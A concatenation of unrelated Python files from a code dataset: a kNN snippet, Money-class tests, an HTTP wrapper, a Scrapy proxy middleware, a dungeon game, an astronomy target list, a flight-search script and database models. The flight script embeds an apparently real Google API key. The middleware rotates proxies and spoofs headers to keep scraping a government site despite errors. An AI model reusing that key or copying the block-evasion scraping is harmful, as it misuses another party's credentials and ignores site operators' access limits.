5、准确率\r\ngl= knn.score(x_test,y_test)\r\nprint(gl)\r\n","sub_path":"机器学习/k邻近分类.py","file_name":"k邻近分类.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"464730464","text":"import unittest\n\nfrom ddby import Money\n\nclass TestMoney(unittest.TestCase):\n\n def test_adding_two_monies(self):\n m1 = Money(500, 'USD')\n m2 = Money(200, 'USD')\n\n actual = m1 + m2\n expected = Money(700, 'USD')\n\n assert actual == expected\n\n def test_subtracting_two_monies(self):\n m1 = Money(500, 'USD')\n m2 = Money(200, 'USD')\n\n actual = m1 - m2\n expected = Money(300, 'USD')\n\n assert actual == expected\n\n def test_adding_two_monies_of_different_precision(self):\n m1 = Money(340, 'USD')\n m2 = Money(4501, 'USD', 3)\n\n expected = Money(7901, 'USD', 3)\n actual = m1 + m2\n\n assert actual.precise_amount == expected.precise_amount\n assert actual.precision == expected.precision\n\n def test_subtracting_two_monies_of_different_precision(self):\n m1 = Money(4501, 'USD', 3)\n m2 = Money(340, 'USD')\n\n expected = Money(1101, 'USD', 3)\n actual = m1 - m2\n\n assert actual.precise_amount == expected.precise_amount\n assert actual.precision == expected.precision\n\n def test_multipying_a_money_object(self):\n m1 = Money(4500, 'USD')\n m_amount = 2\n \n expected = Money(9000, 'USD')\n\n actual = m1 * m_amount\n\n assert actual == expected\n\n def test_dividing_a_money_object(self):\n m1 = Money(9000, 'USD')\n m_amount = 2\n \n expected = Money(4500, 'USD')\n\n actual = m1 / m_amount\n\n assert actual == expected, \"Actual not equal to expected: {0} :: {1}\".format(actual, expected)\n\n def test_iadd(self):\n m1 = Money(9000, 'USD')\n add_amount = Money(3000, 'USD')\n\n expected = Money(12000, 'USD')\n m1 += add_amount\n assert m1 == expected\n\n def test_rmultiply(self):\n m1 = Money(4500, 'USD')\n m_amount = 2\n expected = Money(9000, 'USD')\n actual = m_amount * m1\n\n assert actual == expected\n\nif __name__ == '__main__':\n unittest.main()\n\n","sub_path":"tests/test_math.py","file_name":"test_math.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"30326547","text":"# -*- encoding: utf-8 -*-\n\nfrom __future__ import unicode_literals\n\nimport requests\n\nfrom builtins import bytes\nfrom builtins import str\nfrom copy import deepcopy\n\n\nclass YRequests(object):\n \"\"\" Class to make simple requests. It is a wrapper of `requests` module, but\n it try to handle all errors.\n\n How to use:\n\n >>> from yrequests import YRequests\n >>> req = YRequests()\n >>> result = req.get('http://url.com/a/b/c', params={'q': 'apple'})\n >>> if result['ok']:\n >>> print(result['text']) # or result['json']\n >>> # do stuffs when everything is fine\n >>> else:\n >>> print(result['error']) # or result['status_code']\n >>> # do stuffs when an error occurs\n >>>\n\n You can also use `post`, `put`, `delete`, `head` and `options`. These\n (HTTP) methods receive the same parameters of `requests` module. If need\n instructions of how `requests` module works take a look at:\n http://docs.python-requests.org/en/master/user/quickstart/\n\n The `result` is a `dict` object:\n\n >>> result = {\n >>> 'ok': ,\n >>> 'error': ,\n >>> 'error_type': ,\n >>> 'response': ,\n >>> 'headers': ,\n >>> 'status_code': ,\n >>> 'content_type': ,\n >>> 'text': ,\n >>> 'json': ,\n >>> }\n >>>\n\n Result keys:\n - ok: True if everything is fine. Always check this value.\n - error: Textual error (when `ok` is False).\n - error_type: A string with the error type code:\n general: General error.\n connection: DNS problem, connection refused, etc. The only exception is\n timed out that has its own code (above).\n timeout: Connection timed out.\n http: HTTP errors as 404, 403, 500, etc.\n json: \"Content-Type\" header is indicated as JSON but the content is not\n a valid JSON.\n - response: A response object of request (same of `requests` module). You\n can use as fallback to check informations that are not handled by this\n class.\n - headers: Dictionary with the response headers (same of `requests.response`\n module).\n - status_code: Integer of HTTP status code (200, 404, 500, etc).\n - content_type: The \"Content-Type\" header value.\n - text: The content of response (if any). It's always unicode.\n - json: A dictionary of the content if the \"Content-Type\" header is\n indicated as JSON.\n \"\"\"\n\n ERROR_GENERAL = 'general'\n ERROR_CONNECTION = 'connection'\n ERROR_TIMEOUT = 'timeout'\n ERROR_HTTP = 'http'\n ERROR_JSON = 'json'\n\n def __init__(self, timeout=60, headers=None):\n \"\"\"\n :param timeout: Default timeout (seconds) for all requests.\n :param headers: Default headers (`dict`) for all requests.\n \"\"\"\n self.headers = headers or {}\n self.timeout = timeout\n\n def __get_result_tpl(self):\n return {\n 'ok': False,\n 'error': None,\n 'error_type': None,\n 'response': None,\n 'headers': {},\n 'status_code': None,\n 'content_type': None,\n 'text': None,\n 'json': None,\n }\n\n def __e_to_str(self, e):\n if isinstance(e, bytes):\n e = e.decode('utf-8')\n else:\n e = str(e)\n return e\n\n def __req(self, method, *args, **kwargs):\n \"\"\" Make a request. The `args` and `kwargs` are passed to\n the respective `requests.`.\n\n The first parameter is required and indicates the HTTP method. The\n others parameters will be passed to the `requests` function.\n\n The `headers` and `timeout` parameters are filled using the headers and\n timeout passed in the constructor (`__init__`). If this method received\n a `headers` or `timeout` it will override the defaults values. The\n `headers` parameter only overrides the specified keys of default\n headers.\n\n This method always returns a `dict` object (result):\n\n >>> result = {\n >>> 'ok': ,\n >>> 'error': ,\n >>> 'error_type': ,\n >>> 'response': ,\n >>> 'headers': ,\n >>> 'status_code': ,\n >>> 'content_type': ,\n >>> 'text': ,\n >>> 'json': ,\n >>> }\n >>>\n\n Result keys:\n - ok: True if everything is fine. Always check this value.\n - error: Textual error (when `ok` is False).\n - error_type: A string with the error type code:\n general: General error.\n connection: DNS problem, connection refused, etc. The only exception is\n timed out that has its own code (above).\n timeout: Connection timed out.\n http: HTTP errors as 404, 403, 500, etc.\n json: \"Content-Type\" header is indicated as JSON but the content is not\n a valid JSON.\n - response: A response object of request (same of `requests` module). You\n can use as fallback to check informations that are not handled by this\n class.\n - headers: Dictionary with the response headers (same of `requests.response`\n module).\n - status_code: Integer of HTTP status code (200, 404, 500, etc).\n - content_type: The \"Content-Type\" header value.\n - text: The content of response (if any). It's always unicode.\n - json: A dictionary of the content if the \"Content-Type\" header is\n indicated as JSON.\n\n :param method: A string with the HTTP method (GET, POST, PUT, DELETE,\n HEAD, OPTIONS).\n :param args: Positional arguments for `requests.`.\n :param kwargs: Keyword arguments arguments for `requests.`.\n :return Result dictionary.\n \"\"\"\n result = self.__get_result_tpl()\n kwargs = deepcopy(kwargs)\n headers = {}\n\n if 'timeout' not in kwargs and self.timeout:\n kwargs['timeout'] = self.timeout\n\n if self.headers:\n headers.update(self.headers)\n\n if 'headers' in kwargs:\n headers.update(kwargs['headers'])\n\n kwargs['headers'] = headers\n\n request_func_methods = {\n 'GET': requests.get,\n 'POST': requests.post,\n 'PUT': requests.put,\n 'DELETE': requests.delete,\n 'HEAD': requests.head,\n 'OPTIONS': requests.options,\n }\n\n request_func = request_func_methods.get(method)\n\n if request_func is None:\n result['error'] = 'Method %s is not allowed' % method\n result['error_type'] = self.ERROR_GENERAL\n return result\n\n try:\n response = request_func(*args, **kwargs)\n except requests.ConnectionError as e:\n result['error'] = self.__e_to_str(e)\n result['error_type'] = self.ERROR_CONNECTION\n return result\n except requests.Timeout as e:\n result['error'] = self.__e_to_str(e)\n result['error_type'] = self.ERROR_TIMEOUT\n return result\n except Exception as e:\n result['error'] = self.__e_to_str(e)\n result['error_type'] = self.ERROR_CONNECTION\n return result\n\n result['response'] = response\n result['headers'] = response.headers\n result['status_code'] = response.status_code\n try:\n result['content_type'] = response.headers['content-type']\n except KeyError:\n result['content_type'] = None\n\n if isinstance(response.text, str):\n result['text'] = response.text\n\n is_json = False\n if result['content_type'] and '/json' in result['content_type']:\n is_json = True\n\n if is_json:\n try:\n result['json'] = response.json()\n except (ValueError, TypeError):\n result['error'] = 'The content is not a valid JSON.'\n result['error_type'] = self.ERROR_JSON\n return result\n\n try:\n response.raise_for_status()\n except requests.HTTPError as e:\n result['error'] = self.__e_to_str(e)\n result['error_type'] = self.ERROR_HTTP\n return result\n except Exception as e:\n result['error'] = self.__e_to_str(e)\n result['error_type'] = self.ERROR_GENERAL\n return result\n\n result['ok'] = True\n return result\n\n def get(self, *args, **kwargs):\n return self.__req('GET', *args, **kwargs)\n\n def post(self, *args, **kwargs):\n return self.__req('POST', *args, **kwargs)\n\n def put(self, *args, **kwargs):\n return self.__req('PUT', *args, **kwargs)\n\n def delete(self, *args, **kwargs):\n return self.__req('DELETE', *args, **kwargs)\n\n def head(self, *args, **kwargs):\n return self.__req('head', *args, **kwargs)\n\n def options(self, *args, **kwargs):\n return self.__req('OPTIONS', *args, **kwargs)\n","sub_path":"yrequests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"541346564","text":"\"\"\"\nSuppose you have a long flowerbed in which some of the plots are planted and some are not. However, flowers cannot be planted in adjacent plots - they would compete for water and both would die.\n\nGiven a flowerbed (represented as an array containing 0 and 1, where 0 means empty and 1 means not empty), and a number n, return if n new flowers can be planted in it without violating the no-adjacent-flowers rule.\n\n\"\"\"\n# Greedy: place a flower at every vacant spot encountered from left to right\nclass Solution(object):\n def canPlaceFlowers(self, flowerbed, n):\n \"\"\"\n :type flowerbed: List[int]\n :type n: int\n :rtype: bool\n \"\"\"\n i = count = 0\n while i < len(flowerbed):\n if (flowerbed[i] == 0 and (i == 0 or flowerbed[i - 1] == 0) and (i == len(flowerbed) - 1 or flowerbed[i + 1] == 0)):\n #flowerbed[i++] = 1;\n i += 1 \n count += 1\n if(count>=n):\n return True\n i += 1\n return False\n","sub_path":"python_leetcode_2020/Python_Leetcode_2020/605_can_place_flowers.py","file_name":"605_can_place_flowers.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"310437333","text":"from scrapy.utils.project import get_project_settings\nimport random\nimport requests\nfrom pybase.apollo_setting import get_project_settings as apollo_settings\nfrom scrapy.exceptions import IgnoreRequest\n\nUSER_AGENT_BOX = [\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',\n 'Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.9.168 Version/11.50',\n 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; Tablet PC 2.0; .NET4.0E)',\n 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3)',\n 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.0)',\n 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)',\n 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',\n 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ) AppleWebKit/534.12 (KHTML, like Gecko) Maxthon/3.0 Safari/534.12',\n 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)',\n 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E; SE 2.X MetaSr 1.0)',\n 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.33 Safari/534.3 SE 2.X MetaSr 1.0',\n 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)',\n 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1 QQBrowser/6.9.11079.201',\n 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) QQBrowser/6.9.11079.201',\n 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)']\n\nfrom scrapy.downloadermiddlewares.retry import RetryMiddleware\n\n# 捕捉异常的模块:【关键】\nfrom twisted.internet import defer\nfrom twisted.internet.error import TimeoutError, DNSLookupError, \\\n ConnectionRefusedError, ConnectionDone, ConnectError, \\\n ConnectionLost, TCPTimedOutError\nfrom scrapy.http import HtmlResponse\nfrom twisted.web.client import ResponseFailed\nfrom scrapy.core.downloader.handlers.http11 import TunnelError\n\nimport time\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass ScrapyproxyMiddleware(RetryMiddleware):\n\n def __init__(self, settings):\n self.count = 0\n self.proxy_ip1 = [\"60.184.116.116:20681\"] # 随便给一个\n self.setting = get_project_settings()\n self.apollo_setting = apollo_settings()\n self.proxy_conf = self.apollo_setting.get('PROXY_GET_URL')\n self.USER_AGENT_BOX = USER_AGENT_BOX\n\n self.max_retry_times = settings.getint('RETRY_TIMES')\n self.retry_http_codes = set(int(x) for x in settings.getlist('RETRY_HTTP_CODES'))\n self.priority_adjust = settings.getint('RETRY_PRIORITY_ADJUST')\n\n def get_ip(self):\n p = requests.get('http://192.168.3.85:5010/get').json()\n if p.get(\"code\") == 0:\n logger.warning(p.get(\"src\"))\n time.sleep(60)\n self.get_ip()\n else:\n proxy_ip = p.get('proxy')\n print(proxy_ip)\n self.count = self.count + 1\n self.handle_ip_error(self.count)\n return proxy_ip\n\n def process_request_back(self, request, spider):\n self.proxy_ip1[-1] = self.get_ip()\n request.meta[\"proxy\"] = self.proxy_ip1[-1]\n\n # 拦截请求\n def process_request(self, request, spider):\n # ua = random.choice(self.USER_AGENT_BOX)\n request.headers[\n 'User-Agent'] = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\"\n request.headers['Host'] = 'whlyj.beijing.gov.cn'\n proxy_ip = self.proxy_ip1[-1] # self.proxy_ip1是一个永远只有一个值得列表。若是没有出现异常就一直固定该ip值。而不是每次请求不同ip就会更换。\n if request.url.startswith('http:'):\n proxy = f'http://{proxy_ip}'\n elif request.url.startswith('https:'):\n proxy = f\"https://{proxy_ip}\"\n request.meta['proxy'] = proxy\n\n # 拦截响应\n def process_response(self, request, response, spider):\n # 如果返回的response状态不是200,重新生成当前request对象\n if response.status == 404: # 状态码:404\n return response # 404一般是页面找不到,不用再返回请求。会自动忽略404的页面\n elif response.status != 200: # 状态码:非200\n self.process_request_back(request, spider)\n return request\n else: # 状态码:200\n return response\n\n # 拦截异常\n def process_exception(self, request, exception, spider): # 处理所有的异常,将异常情况加上代理,返回request\n if isinstance(exception, TimeoutError):\n self.process_request_back(request, spider)\n return request # 关键\n elif isinstance(exception, ConnectionRefusedError):\n self.process_request_back(request, spider)\n return request # 关键\n elif isinstance(exception, TCPTimedOutError):\n self.process_request_back(request, spider)\n return request # 关键\n\n elif isinstance(exception, ConnectionLost):\n self.process_request_back(request, spider)\n return request # 关键\n\n else:\n self.process_request_back(request, spider)\n return request # 关键\n\n def handle_ip_error(self, count1):\n import os\n # 防止很多ip不可用,导致ip浪费,有必要设置ip的最大限制,最大数量的ip到达后就关闭爬虫,防止ip一直被使用下去。导致爬虫资源的浪费\n limit_ipcount = 200 # 可以设置\n if count1 > limit_ipcount:\n print(\"ip数量使用超出%s,爬虫即将关闭\" % limit_ipcount)\n os._exit(0)\n else:\n return count1\n","sub_path":"Scrapy_CQC_NYDL_SNCY_chinabz/Scrapy_CQC_NYDL_SNCY_chinabz/middlewares.py","file_name":"middlewares.py","file_ext":"py","file_size_in_byte":6771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"466331316","text":"\n\nfrom xai.brain.wordbase.nouns._butler import _BUTLER\n\n#calss header\nclass _BUTLERS(_BUTLER, ):\n\tdef __init__(self,): \n\t\t_BUTLER.__init__(self)\n\t\tself.name = \"BUTLERS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"butler\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_butlers.py","file_name":"_butlers.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"346835216","text":"import logging\nimport pdb\nimport random\n\n#list of locations\n\nCELLS = [(0,0),(0,1),(0,2),\n (1,0),(1,1),(1,2),\n (2,0),(2,1),(2,2)]\nlogging.basicConfig(filename='game.log',level=logging.DEBUG)\n\ndef getLocations():\n\n monster = random.choice(CELLS)\n door = random.choice(CELLS)\n start = random.choice(CELLS)#this is the player\n if monster == door or monster == start or door == start:\n return getLocations()\n\n return monster,door,start\n\n\ndef movePlayer(player,move):\n x,y = player\n\n if move == 'LEFT':\n y -=1\n elif move == 'RIGHT':\n y+=1\n elif move == 'UP':\n x-=1\n elif move == 'DOWN':\n x+=1\n\n return x,y\n\ndef getMoves(player):\n moves = ['LEFT','RIGHT','UP','DOWN']\n if player[1] == 0:\n moves.remove('LEFT')\n if player[1] == 2:\n moves.remove('RIGHT')\n\n if player[0] == 0:\n moves.remove('UP')\n if player[0] == 2:\n moves.remove('DOWN')\n\n\n\n return moves\n\ndef drawMap(player):\n print('_ _ _')\n tile = '|{}'\n for idx, cell in enumerate(CELLS):\n if idx in [0,1,3,4,6,7]:\n if cell == player:\n print(tile.format('X'), end ='')\n else:\n print(tile.format('_'), end='')\n else:\n if cell == player:\n print(tile.format('X|'))\n else:\n print(tile.format('_|'))\n\n\nmonster, door, player = getLocations()#grabs the elements returned from the getlocations function\nlogging.info('monster: {}: door: {}'.format(monster,door))\nprint(\"Welcome to the dungeon\")\nwhile True:\n moves = getMoves(player)\n\n print(\"You're currently in room {}\".format(player)) #fill in with player position\n drawMap(player)\n print(\"You can move {}\".format(moves)) #fill in with available moves\n print(\"Enter QUIT to quit\")\n\n move = input(\"> \")\n move = move.upper()\n\n if move == 'QUIT':\n break\n if move in moves:\n player = movePlayer(player,move)\n else:\n print(\"**Haha you ran into a wall, try again\")\n continue\n if player == door:\n print(\"Lucky, You have escaped!\")\n break\n elif player == monster:\n print(\"Bad Move, you are now dinner!\")\n break\n\n\n\n","sub_path":"files/dungeon.py","file_name":"dungeon.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"143025404","text":"\"\"\"Random walk algorithm in a grid.\"\"\"\n\nfrom maps import const\nfrom maps import grid\nimport random\n\n\nclass RandomWalk(grid.Grid):\n \"\"\"Implement the Random walk algorithm.\"\"\"\n\n def __init__(self, height=25, width=25):\n \"\"\"Constructor for a grid map filled with walls.\"\"\"\n super().__init__(height, width)\n self._filled = int(self._area * 0.4)\n\n def generate_grid(self):\n \"\"\"Generate a cave style grid with Random Walk algorithm.\"\"\"\n coord = (self._height - 1, random.randint(1, self._width - 2))\n self._grid[coord[0]][coord[1]] = const.FLOOR\n\n direction = [(-1, 0), (0, 1), (1, 0), (0, -1)]\n while self._filled > 0:\n step = random.choice(direction)\n\n if not self.is_border(coord[0] + step[0], coord[1] + step[1]):\n coord = (coord[0] + step[0], coord[1] + step[1])\n if self._grid[coord[0]][coord[1]] == const.WALL:\n self._grid[coord[0]][coord[1]] = const.FLOOR\n self._filled -= 1\n","sub_path":"maps/random_walk.py","file_name":"random_walk.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"43366204","text":"#\n#\n#Problem 4:\n#\n#\nfrom hwk_6_p3 import search # write once, use often!\nfrom requests import get # this function gets a webpage's contents. used to compare with socket.\n\ndef req_page(URL):\n\t'''Uses the requests package to handle redirects as alternative to socket connection. Returns page contents as string'''\n\tURL=URL.strip('http://') #let the function take full weblink input if someone does that for some reason\n\taddress='http://{}'.format(URL).encode('utf-8') # make the full url\n\tpage=get(address) # get() listens on port 80 by default\n\twhile True:\n\t\ttry:\n\t\t\tcontents=str(page.text) # take just the text from get() output\n\t\texcept Exception:\n\t\t\tprint('contents not stringable')\n\t\telse:\n\t\t\treturn(contents)\n\nif __name__==\"__main__\":\n\turl='web.physics.ucsb.edu/~phys129/lipman/'\n\tpage=req_page(url)\n\tlatest=search('Latest update',page) #search the webpage contents\n\t#reformat output\n\tlatest=latest.replace('','').replace('

','')\n\tlatest=latest.replace(' ',' ').replace(',','')\n\tprint(latest)\n\n## SCRIPT OUTPUT\n\n# $python3 hwk_6_p3.py \n# Latest update: Wednesday June 20","sub_path":"Homework_6/hwk_6_p4.py","file_name":"hwk_6_p4.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"172414939","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport astropy.units as u\nimport astropy.constants as const\nfrom astropy.coordinates import SkyCoord\nfrom EXOSIMS.Prototypes.TargetList import TargetList\n\nclass KnownRVPlanetsTargetList(TargetList):\n \"\"\"Target list based on population of known RV planets from IPAC.\n Intended for use with the KnownRVPlanets family of modules.\n \n Args: \n \\*\\*specs: \n user specified values\n \n \"\"\"\n\n def __init__(self, **specs):\n \n #define mapping between attributes we need and the IPAC data\n #table loaded in the Planet Population module\n self.atts_mapping = {'Name':'pl_hostname',\n 'Spec':'st_spstr',\n 'parx':'st_plx',\n 'Umag':'st_uj',\n 'Bmag':'st_bj',\n 'Vmag':'st_vj',\n 'Rmag':'st_rc',\n 'Imag':'st_ic',\n 'Jmag':'st_j',\n 'Hmag':'st_h',\n 'Kmag':'st_k',\n 'dist':'st_dist',\n 'BV':'st_bmvj',\n 'L':'st_lum', #ln(solLum)\n 'pmra':'st_pmra', #mas/year\n 'pmdec':'st_pmdec', #mas/year\n 'rv': 'st_radv'}\n \n TargetList.__init__(self, **specs)\n\n def populate_target_list(self, **specs):\n \n PPop = self.PlanetPopulation\n Comp = self.Completeness\n OS = self.OpticalSystem\n ZL = self.ZodiacalLight\n \n tmp = PPop.allplanetdata[:]\n # filter out targets with planets outside of WA range \n dist = tmp['st_dist'].filled()*u.pc\n mask = ~tmp['st_dist'].mask \\\n & (np.arctan(PPop.sma*(1 + PPop.eccen)/dist) > OS.IWA) \\\n & (np.arctan(PPop.sma*(1 - PPop.eccen)/dist) < OS.OWA)\n tmp = tmp[mask]\n # filter out redundant targets\n tmp = tmp[np.unique(tmp['pl_hostname'].data, return_index=True)[1]]\n \n # filter missing Vmag and BV, for integration time calculation\n tmp = tmp[~tmp['st_vj'].mask]\n tmp = tmp[~tmp['st_bmvj'].mask]\n \n self.nStars = len(tmp)\n assert self.nStars, \"Target list is empty: nStars = %r\"%self.nStars\n \n for att in self.atts_mapping:\n ma = tmp[self.atts_mapping[att]]\n if type(ma.fill_value) == np.float64:\n setattr(self, att, ma.filled(np.nanmedian(ma)))\n else:\n if (att == 'Name') or (att == 'Spec'):\n setattr(self, att, ma.data.astype(str))\n else:\n setattr(self, att, ma.data)\n # astropy units\n self.parx = self.parx*u.mas\n self.dist = self.dist*u.pc\n self.pmra = self.pmra*u.mas/u.yr\n self.pmdec = self.pmdec*u.mas/u.yr\n self.rv = self.rv*u.km/u.s\n \n self.BC = -2.5*self.L - 26.832 - self.Vmag\n self.L = 10.**self.L\n self.MV = self.Vmag - 5*(np.log10(self.dist.to('pc').value) - 1)\n self.coords = SkyCoord(ra=tmp['ra']*u.deg, dec=tmp['dec']*u.deg, \n distance=self.dist)\n self.Binary_Cut = np.zeros(self.nStars, dtype=bool)\n \n # populate completeness values\n self.comp0 = Comp.target_completeness(self)\n # populate minimum integration time values\n self.tint0 = OS.calc_minintTime(self)\n # calculate 'true' and 'approximate' stellar masses\n self.stellar_mass()\n \n # include new attributes to the target list catalog attributes\n self.catalog_atts.append('comp0')\n self.catalog_atts.append('tint0')\n\n def filter_target_list(self, **specs):\n \"\"\" Filtering is done as part of populating the table, so this \n helper function is just a dummy.\n \n \"\"\"\n \n pass\n","sub_path":"EXOSIMS/TargetList/KnownRVPlanetsTargetList.py","file_name":"KnownRVPlanetsTargetList.py","file_ext":"py","file_size_in_byte":4029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"483364331","text":"import json\nimport requests\n\napi_key = \"AIzaSyAMQ-x96aS6dyp_Txngu7SJZhELW2c7SDM\"\nurl = \"https://www.googleapis.com/qpxExpress/v1/trips/search?key=\" + api_key\nheaders = {'content-type': 'application/json'}\n\nparams = {\n \"request\": {\n \"slice\": [\n {\n \"origin\": \"ICN\",\n \"destination\": \"FCO\",\n \"date\": \"2017-08-19\",\n \"maxStops\": 2,\n \"maxConnectionDuration\": 1200,\n }\n ],\n \"passengers\": {\n \"adultCount\": 1,\n \"childCount\": 0,\n },\n \"solutions\": 10,\n \"refundable\": False,\n \"saleCountry\": \"US\",\n }\n}\n\nresponse = requests.post(url, data=json.dumps(params), headers=headers)\ndata = response.json()\n#print data\n\na = data['trips']['tripOption'][0]['slice'][0]['segment'][0].get('connectionDuration', 'bar')\nprint(a)","sub_path":"basic/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"224351894","text":"# This program gets the user's weight, height, age, and gender,\n# determines his/her basal metabolic rate, and returns how\n# many chocolate bars this is equivalent to\n\n# get input from user\nweight = float(input('Enter your weight (in pounds): '))\nheight = float(input('Enter your height (in inches): '))\nage = int(input('Enter your age (in years): '))\ngender = input('Enter your gender (M/F): ')\n\n# calculate BMR\nif (gender == 'M'):\n BMR = 66 + (6.3*weight)+(12.9*height)-(6.8*age)\nelse:\n BMR = 655 + (4.3*weight)+(4.7*height)-(4.7*age)\n\n# output number of chocolate bars\nprint('\\nTo maintain your weight you need to eat ',BMR/230,' chocolate bars')\n","sub_path":"Labs/Lab3/Lab3_1.py","file_name":"Lab3_1.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"558035662","text":"import os\nimport sys\nimport datetime\nfrom sqlalchemy import Column, ForeignKey, Integer, String, Boolean, DateTime, Float\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import relationship\nfrom sqlalchemy import create_engine\nfrom .db_connector import connector\n\nBase = declarative_base()\n\nclass User(Base):\n __tablename__ = 'user'\n id = Column(Integer, primary_key=True)\n name = Column(String(250), nullable=False)\n email = Column(String(250),nullable=False)\n password = Column(String(250),nullable=False)\n mobile = Column(String(250),nullable=False)\n location = Column(String(250),nullable=False)\n designation = Column(String(250),nullable=False)\n role =Column(String(250),nullable=False)\n confirmed = Column(Boolean,nullable=False,default=False)\n\n def __init__(self,name,email,password,mobile,location,designation,role,confirmed):\n self.name = name\n self.email = email\n self.password = password\n self.mobile = mobile\n self.location = location\n self.designation = designation\n self.role = role\n self.confirmed = confirmed\n\nclass Device(Base):\n __tablename__ = 'device'\n id = Column(Integer, primary_key=True)\n device_id = Column(String(250), nullable=False)\n email = Column(String(250),nullable=False)\n\n def __init__(self,email,device_id):\n self.device_id = device_id\n self.email = email\n\nclass HeartRate(Base):\n __tablename__='heartRate'\n id = Column(Integer, primary_key=True)\n device_id = Column(String(250), nullable=False)\n rate = Column(Integer,nullable=False)\n email = Column(String(250),nullable=False)\n date = Column(String(250),nullable=False)\n time = Column(String(250),nullable=False)\n \n def __init__(self,email,device_id,rate,date,time):\n self.device_id = device_id\n self.rate = rate\n self.email = email\n self.date = date\n self.time = time\n\nclass HeartDetails(Base):\n __tablename__='heartDetails'\n id = Column(Integer, primary_key=True)\n email = Column(String(250),nullable=False)\n age = Column(Integer,nullable=False)\n sex = Column(Integer,nullable=False)\n trestbps = Column(Integer,nullable=False)\n cp = Column(Integer,nullable=False)\n restecg = Column(Integer,nullable=False)\n fbs = Column(Integer,nullable=False)\n chol= Column(Integer,nullable=False)\n thalach = Column(Integer,nullable=False)\n exang = Column(Integer,nullable=False)\n oldpeak = Column(Integer,nullable=False)\n slope = Column(Integer,nullable=False)\n ca = Column(Integer,nullable=False)\n thal = Column(Integer,nullable=False)\n predict = Column(Integer,nullable=False)\n probability = Column(Float,nullable=False)\n\n def __init__(self,email,age,sex,trestbps,cp,restecg,fbs,chol,thalach,exang,oldpeak,slope,ca,thal,predict,prob):\n self.email = email\n self.age = age\n self.sex = sex\n self.trestbps = trestbps\n self.cp = cp\n self.restecg = restecg\n self.fbs = fbs\n self.chol = chol\n self.thalach = 